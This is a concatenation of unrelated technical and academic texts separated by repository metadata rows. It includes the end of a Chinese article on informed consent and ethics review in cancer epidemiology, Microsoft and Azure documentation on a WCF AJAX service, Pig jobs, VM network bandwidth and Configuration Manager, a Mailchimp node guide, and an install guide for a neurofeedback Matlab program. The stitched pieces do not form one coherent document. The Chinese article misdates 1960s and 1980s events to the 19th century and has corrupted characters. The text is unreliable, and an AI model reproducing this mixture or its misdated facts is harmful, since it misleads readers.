国内关于流行病学伦理问题的研究仍然相对匮乏,《中华流行病学杂志》和《American Journal of Epidemiology》分别作为发表中国和美国流行病学研究成果的主要期刊,孟若谷等人2012年对比了两刊2006年至2012年期刊研究论文的伦理学问题,发现中国在伦理审查、采集受试者生物标本和隐私信息的伦理意识等方面与美国均存在较大差距,但两刊伦理意识均呈逐年上升趋势3。
## 伦理学在我国肿瘤流行病学研究中的应用
### 伦理委员会
19世纪80年代初期,国内尚无伦理审查管理条例,中国医学科学院肿瘤研究所同美国国家卫生研究院国立癌症研究所合作开展大规模的肿瘤流行病学研究时,就建立了伦理委员会(Institutional review board, IRB),遵循国际准则开展伦理审查,包括研究设计合理性、益处与风险以及安慰剂对照的采用等。多次获得NIH保护人类研究对象委员会的“单一项目认证”(single project assurance, SPA)。在云南锡矿工肺癌早诊早治研究中,为确保高危人群的自我权益得到充分保护,有一定数据量的矿工代表参加到普查队,并有一位工会的代表成为云锡劳动防护研究所IRB的成员4。
### 知情同意
知情同意赋予受试者自我选择并决定是否参加的权利,它包含了“知情”和“同意”两部分密切相关的内容。概括起来有研究目的、自愿参加、益处与风险、保密性、联系人和赔偿等6点基本要素。在流行病学研究中,不仅要做到受试者在形式上知情同意,而且要使知情同意工作在实质上达到应有的伦理学标准。但在获取知情同意的过程中,要避免对未来受试者的不正当影响。
CICAMS在林县进行的大规模的随机双盲有对照的营养干预试验,参加者为食管癌高发区的农民29,584名。尽管参加试验的农民属于食管癌高发区的人群,但是他们的基线调查通常显示为无症状或无病状态。他们中的大部分人即使 不参加任何干预,也可能不会发展为食管癌。因此健康个体也被随机分配,接受5年的维生素/矿物质或者安慰剂补充。NCI和CICAMS的IRB均批准了这个科学研究计划,并认为它对于参加者的有益之处大于潜在危险性,是可以接受的。双 方的IRB每年都对这项研究中涉及的伦理性问题进行复审。知情同意书中的信息包括了整个研究的过程,试验的危害性,自愿参加准则,科学研究的真实性,保护隐私性和研究对象分组情况的保密性,以及有1/8被选中安慰剂对照的可能性(半数重复42的析因设计)。由于参加者有40%文盲,项目的现场负责人以小组会和壁报的形式给参加者讲解这项研究的意义和利弊(知情),并解答他们提出的所有问题。自愿参加者在知情同意二|;上逐一签名或按手印(同意)。高发区人群一般都愿意参加癌症预防试验,但对安慰剂对照不喜欢。在保证统计功效的基础上,应尽量减少安慰剂对照的样本数量。另外,研究者也提供了对患病个体的部分医疗照顾和误工补偿。
### 肿瘤筛查
癌症筛查研究与其他研究一样,首先要通过伦理委员会的审批。伦理审查的内容包括研究方案、CRF、研究器械或药物的安全性资料、研究中可能出现问题的对策、知情同意书、主要研究者资质等。对于多中心临床研究还需保证伦理审查的一致性和及时性。组长单位需审核方案的科学性与伦理合理性,参加单位需在接受组长单位审查意见的前提下审查研究在本单位的可行性。赫尔辛基宣言第26条提到:“每位潜在的受试者必须被充分告知:研究目的、方法、资金来源、任何可能的利益冲突、研究人员的机构隶属关系、研究预期的获益和潜在的风险、研究可能造成的不适、试验结束后的条款,以及任何其他相关方面的信息”。因此,受试者在被完全告知、充分理解、没有不正当影响的情况下签署《知情同意书》也是研究的重要组成部分。因参与研究受到伤害的受试者应得到适当的补偿和治疗,必要时可为其购买保险。知情同意书的签署保 护的不仅是受试者的权益,也为研究者规避了一定的风险5。
目前对于肿瘤筛查也是争议不断,对于已经推广的筛查工作,较为肯定的只有乳腺癌和宫颈癌的筛查工作。争议主要是对于筛查目的的认识、筛查作用的认识、生存期延长与领先时间的争议、成本与效益的问题、筛查本身对社会公众带来的心理问题、哪些人应该列为筛查对象的伦理问题以及筛查检出病例的治疗是否比临床诊断的、采取相同疗法的病例更有效?6
### 肿瘤监测
我国自19世纪60年代开展肿瘤监测也就是以人群为基础的肿瘤登记,其目的是监测人群癌症负担以及发展趋势,为病因学研究提供原始资料,有效评价癌症防治措施的效果,为制定癌症防控策略提供依据。
以人群为基础的肿瘤登记,与医学科学研究的个案调查需尊重患者知情同意权不同,肿瘤登记是一项经常性地监测人群癌症发生、死亡与生存情况的社会公共卫生工作,旨在促进人类社会的健康发展。同时,肿瘤登记处在数据收集过程所获得登记病例信息是间接的,获得每一位病人的知情同意是不现实的。如要获得全部登记病例的知情同意,则该项工作基本不能实施。如果仅有部分知情同意,登记所获得信息则无法达到肿瘤登记数据的可比性、完整性和有效性的基本要求标准。肿瘤登记资料的获取、保存和利用应遵循赫尔辛基宣言和纽伦堡法典中所提及的医学伦理学的基本原则。而WHO公布的《公共卫生监测伦理指南》第12条也指出“如果可靠、有效、完全的数据集是必须的,且相关的保护措施得当,那么个人有义务为监测做出贡献。在这些情况下,知情同意不一定伦理上必须的”7, 8。但在肿瘤登记实际运行过程中和数据利用及信息发布时,相关的保密原则是应严格执行,要充分尊重患者的隐私权,防止个人信息泄露和数据滥用。国家卫生计生委、国家中医药管理局联合下发的“关于印发肿瘤登记管理办法的通知”国卫疾控发【2015】6号文件第五章保障措施中的第十九条专门对肿瘤资料保密作出规定:“各肿瘤报告单位及有关研究机构在利用肿瘤登记报告信息时,应当遵从国家法律法规和有关规定、伦理学准则、知识产权准则和保密原则,对个案肿瘤病例信息采取管理和技术上的安全措施,保护患者隐私和信息安全。”
## 参考文献
1. SOSKOLNE CL. EPIDEMIOLOGY: QUESTIONS OF SCIENCE, ETHICS, MORALITY, AND LAW. American Journal of Epidemiology 1989;129:1-18.
2. 涉及人的生物医学研究伦理审查办法 中华人民共和国中央人民政府, 2016.
3. 孟若谷, 翟炎冰, 陈森, 张晏畅, 张越伦, 赵剑云, 孙凤. 《中华流行病学杂志》和 American Journal of Epidemiology 的医学伦理问题比较. 中华流行病学杂志 2012;33:106-10.
4. 乔友林. 在中国开展肿瘤流行病学研究的伦理学问题. 北京国际生命伦理学学术会议 2004.
5. 陈世耀, 杜玄凌, 韦怡超. 开展早癌筛查研究面临的问题. 中国癌症防治杂志 2017;9:90-93.
6. 杨秉辉. 关于肿瘤筛查的争议与思考. 医学与哲学 2017;38:2-4.
7. 张海洪, 丛亚丽. 世界卫生组织《公共卫生监测伦理指南》要点及启示. 医学与哲学 2018;39:26-28,36.
8. 巴璐, 蔡慧媛, 戎或. 公共卫生监测中的伦理问题及其借鉴意义. 医学与哲学 2019;40:33-39.
| 93.777778 | 599 | 0.87891 | yue_Hant | 0.855696 |
e056dbd56b1ba341ab4b2f4addbf25739520e447 | 3,800 | md | Markdown | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "基本 AJAX 服务 | Microsoft Docs"
ms.custom: ""
ms.date: "03/30/2017"
ms.prod: ".net-framework-4.6"
ms.reviewer: ""
ms.suite: ""
ms.technology:
- "dotnet-clr"
ms.tgt_pltfrm: ""
ms.topic: "article"
ms.assetid: d66d0c91-0109-45a0-a901-f3e4667c2465
caps.latest.revision: 30
author: "Erikre"
ms.author: "erikre"
manager: "erikre"
caps.handback.revision: 30
---
# 基本 AJAX 服务
本示例演示如何使用 [!INCLUDE[indigo1](../../../../includes/indigo1-md.md)] 创建基本的 ASP.NET 异步 JavaScript 和 XML \(AJAX\) 服务(通过从 Web 浏览器客户端使用 JavaScript 代码可以访问的服务)。 该服务使用 <xref:System.ServiceModel.Web.WebGetAttribute> 属性以确保服务响应 HTTP GET 请求并被配置为对响应使用 JavaScript 对象表示法 \(JSON\) 数据格式。
[!INCLUDE[indigo2](../../../../includes/indigo2-md.md)] 对 AJAX 的支持经过了优化,以便通过 `ScriptManager` 控件与 ASP.NET AJAX 一起使用。 有关将 ASP.NET AJAX 与 [!INCLUDE[indigo2](../../../../includes/indigo2-md.md)] 一起使用的示例,请参见 [AJAX Samples](http://msdn.microsoft.com/zh-cn/f3fa45b3-44d5-4926-8cc4-a13c30a3bf3e)。
> [!NOTE]
> 本主题的最后介绍了此示例的设置过程和生成说明。
在下面的代码中,将 <xref:System.ServiceModel.Web.WebGetAttribute> 属性应用于 `Add` 操作以确保服务响应 HTTP GET 请求。 为了简单起见,该代码使用 GET(您可以从任何 Web 浏览器构造 HTTP GET 请求)。 也可以使用 GET 来启用缓存。 在缺少 `WebGetAttribute` 属性时,HTTP POST 是默认属性。
```
[ServiceContract(Namespace = "SimpleAjaxService")]
public interface ICalculator
{
[WebGet]
double Add(double n1, double n2);
//Other operations omitted…
}
```
示例 .svc 文件使用的是 <xref:System.ServiceModel.Activation.WebScriptServiceHostFactory>,后者会将 <xref:System.ServiceModel.Description.WebScriptEndpoint> 标准终结点添加到服务。 可在相对于 .svc 文件的空地址处配置该终结点。 这意味着服务的地址是 http:\/\/localhost\/ServiceModelSamples\/service.svc,除了操作名以外没有其他后缀。
```
<%@ServiceHost language="C#" Debug="true" Service="Microsoft.Samples.SimpleAjaxService.CalculatorService" Factory="System.ServiceModel.Activation.WebScriptServiceHostFactory" %>
```
将对 <xref:System.ServiceModel.Description.WebScriptEndpoint> 进行预配置,以便能从 ASP.NET AJAX 客户端页访问服务。 可以使用 Web.config 中的以下节对终结点进行其他配置更改。 如果不需要额外更改,则可以移除该节。
```xml
<system.serviceModel>
<standardEndpoints>
<webScriptEndpoint>
<!-- Use this element to configure the endpoint -->
<standardEndpoint name="" />
</webScriptEndpoint>
</standardEndpoints>
</system.serviceModel>
```
<xref:System.ServiceModel.Description.WebScriptEndpoint> 将服务的默认数据格式设置为 JSON 而不是 XML。 若要调用服务,请在完成本主题后面的设置和生成步骤 后定位到 http:\/\/localhost\/ServiceModelSamples\/service.svc\/Add?n1\=100&n2\=200。 这个测试功能是通过使用 HTTP GET 请求实现的。
客户端 Web 页 SimpleAjaxClientPage.aspx 包含 ASP.NET 代码,无论何时用户单击该页面上的操作按钮之一,就能调用服务。 `ScriptManager` 控件用于使服务的代理可以通过 JavaScript 访问。
```
<asp:ScriptManager ID="ScriptManager" runat="server">
<Services>
<asp:ServiceReference Path="service.svc" />
</Services>
</asp:ScriptManager>
```
使用以下 JavaScript 代码实例化本地代理和调用操作。
```
// Code for extracting arguments n1 and n2 omitted…
// Instantiate a service proxy
var proxy = new SimpleAjaxService.ICalculator();
// Code for selecting operation omitted…
proxy.Add(parseFloat(n1), parseFloat(n2), onSuccess, onFail, null);
```
如果服务调用成功,则代码调用 `onSuccess` 处理程序并在文本框中显示操作结果。
```
function onSuccess(mathResult){
document.getElementById("result").value = mathResult;
}
```
> [!IMPORTANT]
> 您的计算机上可能已安装这些示例。 在继续操作之前,请先检查以下(默认)目录:
>
> `<安装驱动器>:\WF_WCF_Samples`
>
> 如果此目录不存在,请访问[针对 .NET Framework 4 的 Windows Communication Foundation \(WCF\) 和 Windows Workflow Foundation \(WF\) 示例](http://go.microsoft.com/fwlink/?LinkId=150780)(可能为英文网页),下载所有 [!INCLUDE[indigo1](../../../../includes/indigo1-md.md)] 和 [!INCLUDE[wf1](../../../../includes/wf1-md.md)] 示例。 此示例位于以下目录:
>
> `<安装驱动器>:\WF_WCF_Samples\WCF\Basic\Ajax\SimpleAjaxService`
## 请参阅 | 36.893204 | 304 | 0.7 | yue_Hant | 0.924976 |
e05747b1bd1947ac37d98023fcb894a146206a7e | 6,110 | md | Markdown | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-03-22T15:03:27.000Z | 2022-03-22T15:03:27.000Z | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-14T19:38:19.000Z | 2020-05-14T19:38:19.000Z | ---
title: Use Hadoop Pig with Remote Desktop in HDInsight | Microsoft Docs
description: Learn how to use the Pig command to run Pig Latin statements from a Remote Desktop connection to a Windows-based Hadoop cluster in HDInsight.
services: hdinsight
documentationcenter: ''
author: Blackmist
manager: jhubbard
editor: cgronlun
tags: azure-portal
ms.assetid: e034a286-de0f-465f-8bf1-3d085ca6abed
ms.service: hdinsight
ms.devlang: na
ms.topic: article
ms.tgt_pltfrm: na
ms.workload: big-data
ms.date: 01/17/2017
ms.author: larryfr
ROBOTS: NOINDEX
---
# Run Pig jobs from a Remote Desktop connection
[!INCLUDE [pig-selector](../../includes/hdinsight-selector-use-pig.md)]
This document provides a walkthrough for using the Pig command to run Pig Latin statements from a Remote Desktop connection to a Windows-based HDInsight cluster. Pig Latin allows you to create MapReduce applications by describing data transformations, rather than map and reduce functions.
> [!IMPORTANT]
> Remote Desktop is only available on HDInsight clusters that use Windows as the operating system. Linux is the only operating system used on HDInsight version 3.4 or greater. For more information, see [HDInsight Deprecation on Windows](hdinsight-component-versioning.md#hdi-version-33-nearing-deprecation-date).
>
> For HDInsight 3.4 or greater, see [Use Pig with HDInsight and SSH](hdinsight-hadoop-use-pig-ssh.md) for information on interactively running Pig jobs directly on the cluster from a command-line.
## <a id="prereq"></a>Prerequisites
To complete the steps in this article, you will need the following.
* A Windows-based HDInsight (Hadoop on HDInsight) cluster
* A client computer running Windows 10, Windows 8, or Windows 7
## <a id="connect"></a>Connect with Remote Desktop
Enable Remote Desktop for the HDInsight cluster, then connect to it by following the instructions at [Connect to HDInsight clusters using RDP](hdinsight-administer-use-management-portal.md#connect-to-clusters-using-rdp).
## <a id="pig"></a>Use the Pig command
1. After you have a Remote Desktop connection, start the **Hadoop Command Line** by using the icon on the desktop.
2. Use the following to start the Pig command:
%pig_home%\bin\pig
You will be presented with a `grunt>` prompt.
3. Enter the following statement:
LOGS = LOAD 'wasbs:///example/data/sample.log';
This command loads the contents of the sample.log file into the LOGS file. You can view the contents of the file by using the following command:
DUMP LOGS;
4. Transform the data by applying a regular expression to extract only the logging level from each record:
LEVELS = foreach LOGS generate REGEX_EXTRACT($0, '(TRACE|DEBUG|INFO|WARN|ERROR|FATAL)', 1) as LOGLEVEL;
You can use **DUMP** to view the data after the transformation. In this case, `DUMP LEVELS;`.
5. Continue applying transformations by using the following statements. Use `DUMP` to view the result of the transformation after each step.
<table>
<tr>
<th>Statement</th><th>What it does</th>
</tr>
<tr>
<td>FILTEREDLEVELS = FILTER LEVELS by LOGLEVEL is not null;</td><td>Removes rows that contain a null value for the log level and stores the results into FILTEREDLEVELS.</td>
</tr>
<tr>
<td>GROUPEDLEVELS = GROUP FILTEREDLEVELS by LOGLEVEL;</td><td>Groups the rows by log level and stores the results into GROUPEDLEVELS.</td>
</tr>
<tr>
<td>FREQUENCIES = foreach GROUPEDLEVELS generate group as LOGLEVEL, COUNT(FILTEREDLEVELS.LOGLEVEL) as COUNT;</td><td>Creates a new set of data that contains each unique log level value and how many times it occurs. This is stored into FREQUENCIES</td>
</tr>
<tr>
<td>RESULT = order FREQUENCIES by COUNT desc;</td><td>Orders the log levels by count (descending,) and stores into RESULT</td>
</tr>
</table>
6. You can also save the results of a transformation by using the `STORE` statement. For example, the following command saves the `RESULT` to the **/example/data/pigout** directory in the default storage container for your cluster:
STORE RESULT into 'wasbs:///example/data/pigout'
> [!NOTE]
> The data is stored in the specified directory in files named **part-nnnnn**. If the directory already exists, you will receive an error message.
>
>
7. To exit the grunt prompt, enter the following statement.
QUIT;
### Pig Latin batch files
You can also use the Pig command to run Pig Latin that is contained in a file.
1. After exiting the grunt prompt, open **Notepad** and create a new file named **pigbatch.pig** in the **%PIG_HOME%** directory.
2. Type or paste the following lines into the **pigbatch.pig** file, and then save it:
LOGS = LOAD 'wasbs:///example/data/sample.log';
LEVELS = foreach LOGS generate REGEX_EXTRACT($0, '(TRACE|DEBUG|INFO|WARN|ERROR|FATAL)', 1) as LOGLEVEL;
FILTEREDLEVELS = FILTER LEVELS by LOGLEVEL is not null;
GROUPEDLEVELS = GROUP FILTEREDLEVELS by LOGLEVEL;
FREQUENCIES = foreach GROUPEDLEVELS generate group as LOGLEVEL, COUNT(FILTEREDLEVELS.LOGLEVEL) as COUNT;
RESULT = order FREQUENCIES by COUNT desc;
DUMP RESULT;
3. Use the following to run the **pigbatch.pig** file using the pig command.
pig %PIG_HOME%\pigbatch.pig
When the batch job completes, you should see the following output, which should be the same as when you used `DUMP RESULT;` in the previous steps:
(TRACE,816)
(DEBUG,434)
(INFO,96)
(WARN,11)
(ERROR,6)
(FATAL,2)
## <a id="summary"></a>Summary
As you can see, the Pig command allows you to interactively run MapReduce operations, or run Pig Latin jobs that are stored in a batch file.
## <a id="nextsteps"></a>Next steps
For general information about Pig in HDInsight:
* [Use Pig with Hadoop on HDInsight](hdinsight-use-pig.md)
For information about other ways you can work with Hadoop on HDInsight:
* [Use Hive with Hadoop on HDInsight](hdinsight-use-hive.md)
* [Use MapReduce with Hadoop on HDInsight](hdinsight-use-mapreduce.md)
| 47.364341 | 312 | 0.734861 | eng_Latn | 0.981311 |
e057a3dc9bb2ce51fab28f90c2746adf0332c404 | 2,366 | md | Markdown | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
author: aczechowski
ms.author: aaroncz
ms.prod: configuration-manager
ms.topic: include
ms.date: 01/22/2019
ms.openlocfilehash: ce1303c5b8e3d279d1f2c9746939329319999498
ms.sourcegitcommit: bbf820c35414bf2cba356f30fe047c1a34c5384d
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 04/21/2020
ms.locfileid: "81717148"
---
## <a name="view-recently-connected-consoles"></a><a name="bkmk_console"></a>Visa nyligen anslutna konsoler
<!--3699367-->
Baserat på din [feedback från UserVoice](https://configurationmanager.uservoice.com/forums/300492-ideas/suggestions/12508299-active-admin-consoles)kan du nu visa de senaste anslutningarna för Configuration Manager-konsolen. Vyn innehåller aktiva anslutningar och de som nyligen var anslutna.
### <a name="prerequisites"></a>Förutsättningar
- Ditt konto måste ha **Läs** behörighet för **SMS_SITE** -objektet
- Aktivera SMS-providern för att använda ett certifikat.<!--SCCMDocs-pr issue 3135--> Välj ett av följande alternativ:
- Aktivera [utökad http](../../../../plan-design/hierarchy/enhanced-http.md) (rekommenderas)
- Bind ett PKI-baserat certifikat manuellt till port 443 i IIS på den server som är värd för SMS-providerns roll
### <a name="try-it-out"></a>prova!
Försök att slutföra uppgifterna. Skicka sedan [feedback](../../../../understand/find-help.md#product-feedback) med dina tankar om funktionen.
1. Gå till arbets ytan **Administration** i Configuration Manager-konsolen.
2. Expandera **säkerhet** och välj noden **konsol anslutningar** .
3. Visa de senaste anslutningarna med följande egenskaper:
- Användarnamn
- Dator namn
- Ansluten platskod
- Konsol version
- Senast ansluten: när användaren senast *öppnade* konsolen
Du ser alltid din aktuella konsol anslutning i listan. Den visar bara anslutningar från Configuration Manager-konsolen, inte PowerShell eller andra SDK-baserade anslutningar till SMS-providern. Platsen tar bort instanser från listan som är äldre än 30 dagar.
### <a name="known-issue"></a>Kända problem
När du visar den här noden kan Configuration Manager-konsolen sluta fungera korrekt.
#### <a name="workaround"></a>Lösning
I egenskaperna för plats rollen SMS-provider inaktiverar du alternativet för att **tillåta Configuration Manager Cloud Management Gateway-trafik för administrations tjänsten**.
| 41.508772 | 292 | 0.764582 | swe_Latn | 0.989545 |
e0580fcbcd4d1659c6f09926b0a663a1a68bacae | 3,328 | md | Markdown | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Azure 虚拟机网络吞吐量 | Microsoft Docs
description: 了解 Azure 虚拟机网络吞吐量。
services: virtual-network
documentationcenter: na
author: steveesp
editor: ''
tags: azure-resource-manager
ms.assetid: ''
ms.service: virtual-network
ms.devlang: na
ms.topic: article
ms.tgt_pltfrm: na
ms.workload: infrastructure-services
ms.date: 4/26/2019
ms.author: kumud,steveesp, mareat
ms.openlocfilehash: 9d74e53c754367ecfa63642514db93354fcadf25
ms.sourcegitcommit: f6ba5c5a4b1ec4e35c41a4e799fb669ad5099522
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 05/06/2019
ms.locfileid: "65153728"
---
# <a name="virtual-machine-network-bandwidth"></a>虚拟机网络带宽
Azure 提供各种 VM 大小和类型,每一种包含的性能各不相同。 其中一种是网络吞吐量(也称带宽),以兆位/秒 (Mbps) 表示。 由于虚拟机托管在共享硬件上,因此网络容量必须在共享同一硬件的虚拟机中公平地共享。 在分配时,较大的虚拟机相对于较小的虚拟机会获得相对较多的带宽。
分配给每个虚拟机的网络带宽按虚拟机的传出(出站)流量计算。 从虚拟机流出的所有网络流量均计入分配限制,不管流向哪个目标。 例如,如果虚拟机的限制为 1,000 Mbps,则不管出站流量的目标是同一虚拟网络中的另一虚拟机,还是 Azure 外部,均适用该限制。
传入流量不直接计算,或者说不直接受到限制。 但是,其他因素(例如 CPU 和存储限制)可能会影响虚拟机处理传入数据的能力。
加速网络是一项旨在改进网络性能(包括延迟、吞吐量和 CPU 使用率)的功能。 虽然加速网络可以改进虚拟机的吞吐量,但仍受分配给该虚拟机的带宽的限制。 若要详细了解如何使用加速网络,请查看适用于 [Windows](create-vm-accelerated-networking-powershell.md) 或 [Linux](create-vm-accelerated-networking-cli.md) 虚拟机的加速网络。
Azure 虚拟机必须有一个(但也可能有多个)连接的网络接口。 分配给某个虚拟机的带宽是流经所有网络接口(已连接到该虚拟机)的所有出站流量的总和。 换言之,分配的带宽是针对每个虚拟机的,不管为该虚拟机连接了多少网络接口。 若要了解不同的 Azure VM 大小支持的网络接口数,请查看 Azure [Windows](../virtual-machines/windows/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) 和 [Linux](../virtual-machines/linux/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) VM 大小。
## <a name="expected-network-throughput"></a>预期的网络吞吐量
若要详细了解每种 VM 大小支持的预期出站吞吐量和网络接口数,请查看 Azure [Windows](../virtual-machines/windows/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) 和 [Linux](../virtual-machines/linux/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) VM 大小。 选择一个类型(例如“通用”),然后在生成的页面上选择一个大小系列(例如“Dv2 系列”)。 每个系统都有一个表,在最后一列(名为“最大 NIC 数/预期网络性能(Mbps)”)中包含网络规格。
吞吐量限制适用于虚拟机。 吞吐量不受以下因素影响:
- **网络接口数**:带宽限制都是累积的所有出站流量从虚拟机。
- **加速网络**:尽管该功能可以有助于流量达到已发布的限制,它不会更改此限制。
- **流量目标**:所有目标都计入出站限制。
- **协议**:所有协议的所有出站流量将计入此限制。
## <a name="network-flow-limits"></a>网络流限制
除了带宽,在任何给定时间在 VM 上存在网络连接数可能会影响其网络性能。 Azure 网络堆栈维护每个方向的名为流的数据结构中的 TCP/UDP 连接的状态。 典型的 TCP/UDP 连接将有 2 个流创建,另一个用于入站和出站方向的另一个。
终结点之间的数据传输,需要创建多个流,除了执行数据传输。 一些示例为创建的 DNS 解析的流和创建负载均衡器运行状况探测的流。 此外请注意,网络如网关、 代理、 防火墙和虚拟设备 (Nva) 将看到正在终止在设备和由设备发起的连接创建的流。

## <a name="flow-limits-and-recommendations"></a>流限制和建议
目前,Azure 网络堆栈支持具有良好的性能 250k 个总网络流的 Vm 使用大于 8 个 CPU 内核和良好性能的 Vm 使用少于 8 个 CPU 内核的 100 k 总流。 超过此限制网络性能下降正常的最大为 1 M 硬限制的其他流的总流,50 万个入站和 500 K 出站、 后的其他流将被删除。
||使用 Vm < 8 个 CPU 内核|具有 8 个 CPU 内核的 Vm|
|---|---|---|
|<b>良好的性能</b>|10 万个流 |250k 个流|
|<b>性能下降</b>|上面 100k 为单位的流|上面 250k 流|
|<b>流限制</b>|1 百万的流|1 百万的流|
度量值位于[Azure Monitor](../azure-monitor/platform/metrics-supported.md#microsoftcomputevirtualmachines)用于跟踪 VM 或 VMSS 实例上的网络流和流创建速率。

连接建立和终止速率也会影响网络性能作为连接建立和终止共享 CPU 与数据包处理例程。 我们建议,都设为基准根据预期的流量模式和横向扩展工作负荷的工作负荷适当地以满足性能需求。
## <a name="next-steps"></a>后续步骤
- [优化虚拟机操作系统的网络吞吐量](virtual-network-optimize-network-bandwidth.md)
- 针对虚拟机[测试网络吞吐量](virtual-network-bandwidth-testing.md)。
| 44.972973 | 334 | 0.788762 | yue_Hant | 0.532645 |
e0586e91b74f85064d643e65a92531e66b16bd0b | 1,469 | md | Markdown | docs/nodes/nodes-library/nodes/Mailchimp/README.md | StrangeBeeCorp/n8n-docs | 934832c74f55b5b85db2d8aae91246d237b6c99c | [
"Apache-2.0"
] | null | null | null | docs/nodes/nodes-library/nodes/Mailchimp/README.md | StrangeBeeCorp/n8n-docs | 934832c74f55b5b85db2d8aae91246d237b6c99c | [
"Apache-2.0"
] | 15 | 2020-06-15T20:38:14.000Z | 2020-07-20T19:14:19.000Z | docs/nodes/nodes-library/nodes/Mailchimp/README.md | MLH-Fellowship/n8n-docs | 9277f16e8f077cc8686ad37b93b917a084c221b2 | [
"Apache-2.0"
] | null | null | null | ---
permalink: /nodes/n8n-nodes-base.mailchimp
---
# Mailchimp
[Mailchimp](https://mailchimp.com/) is an integrated marketing platform that allows business owners to automate their email campaigns and track user engagement.
::: tip 🔑 Credentials
You can find authentication information for this node [here](../../../credentials/Mailchimp/README.md).
:::
## Basic Operations
- Member
- Add a new member on list
- Delete a member on list
- Get a member on list
- Get all members on list
- Update a new member on list
- Member Tag
- Add tags from a list member
- Remove tags from a list member
## Example Usage
This workflow allows you to add a new member to a list in Mailchimp. You can also find the [workflow](https://n8n.io/workflows/413) on this website. This example usage workflow uses the following two nodes.
- [Start](../../core-nodes/Start)
- [Mailchimp]()
The final workflow should look like the following image.

### 1. Start node
The start node exists by default when you create a new workflow.
### 2. Mailchimp node
1. First of all, you'll have to enter credentials for the Mailchimp node. You can find out how to do that [here](../../../credentials/Mailchimp/README.md).
4. Select the Mailchimp list from the *List* dropdown list.
5. Enter the email address in the *Email* field.
6. Select the status from the *Status* dropdown list.
8. Click on *Execute Node* to run the workflow.
| 31.255319 | 206 | 0.732471 | eng_Latn | 0.99023 |
e058770e2004a8240cd37137b16e97bbece6f42e | 5,765 | md | Markdown | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | # Install
- On a Windows computer
- Install Matlab. You may use a student version of Matlab.
- Install BCILAB https://github.com/sccn/BCILAB and add to Matlab path (go to the root folder and type "bcilab")
- Install the Psychophysics toolbox http://psychtoolbox.org/download/ (select download ZIP file) (go to the root folder and type "PsychDefaultSetup(2)")
- Install the Lab Streaming Layer https://github.com/sccn/labstreaminglayer binaries. **Do not clone the project or download the zip for the Github project**. Instead use the binary repository (ftp://sccn.ucsd.edu/pub/software/LSL/). Download ZIP files for the *labrecorder* (App folder), the program that can interface your EEG system (App folder - for example *Biosemix.xx.zip* if you have a BIOSEMI system) and all the LSL librairies (SDK folder *liblsl-ALL-languages-x.xx.zip*). Familiarize yourself with LSL. You need to be able to connect to your EEG hardware and use the LabRecorder to save data from your hardware, then open and inspect that data under the EEGLAB software (for example). When ready, add the path to Matlab driver to your Matlab path (*liblsl-All-Languages-x.xx/liblsl-Matlab* folder).
# Computer settings
- Set up your screen resolution and screen settings. This program is made to be run on 2 screens, one screen for the subject and one screen for the expertimenter. For technical reasons, it is always better to set your primary screen as the screen for the subject (otherwise the psychophysics toolbox might not work properly).
- Disable visual buffering in Matlab. Create an icon on the desktop for Matlab. Look at properties - compatibility tab. Disable "Desktop composition" and "Disable display scaling on high DPI setttings".
- Go to your graphic card properties (display settings and select your graphic card). If you do not have graphic properties, then do not worry about this step. Disable tripple buferring, double buffering and any other fancy option (3-D etc...).
# Program settings
Program settings are contained in the file [nfblab_options.m](src/nfblab_options.m). Parameters are explained below.
## General parameters
- psychoToolbox (true/false), Toggle to false for testing without psych toolbox
